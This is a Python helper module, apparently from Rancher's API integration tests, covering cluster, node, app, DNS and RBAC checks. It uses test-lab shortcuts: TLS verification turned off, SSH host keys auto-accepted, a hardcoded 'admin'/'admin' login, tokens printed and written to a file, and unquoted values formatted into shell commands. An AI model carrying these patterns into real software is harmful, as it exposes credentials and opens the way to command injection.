dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
cmd = "ping -c 1 -W 1 " + pod_ip
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
response = kubectl_pod_exec(pod1, cmd)
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
cmd_write = \
'powershell -NoLogo -NonInteractive -Command ' \
'"& { echo {1} > {0} }"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
'"& { cat {0} }"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
@param proj_client: Project client object of a existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
@param answer: answer, app seek while deploying, body of the post call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
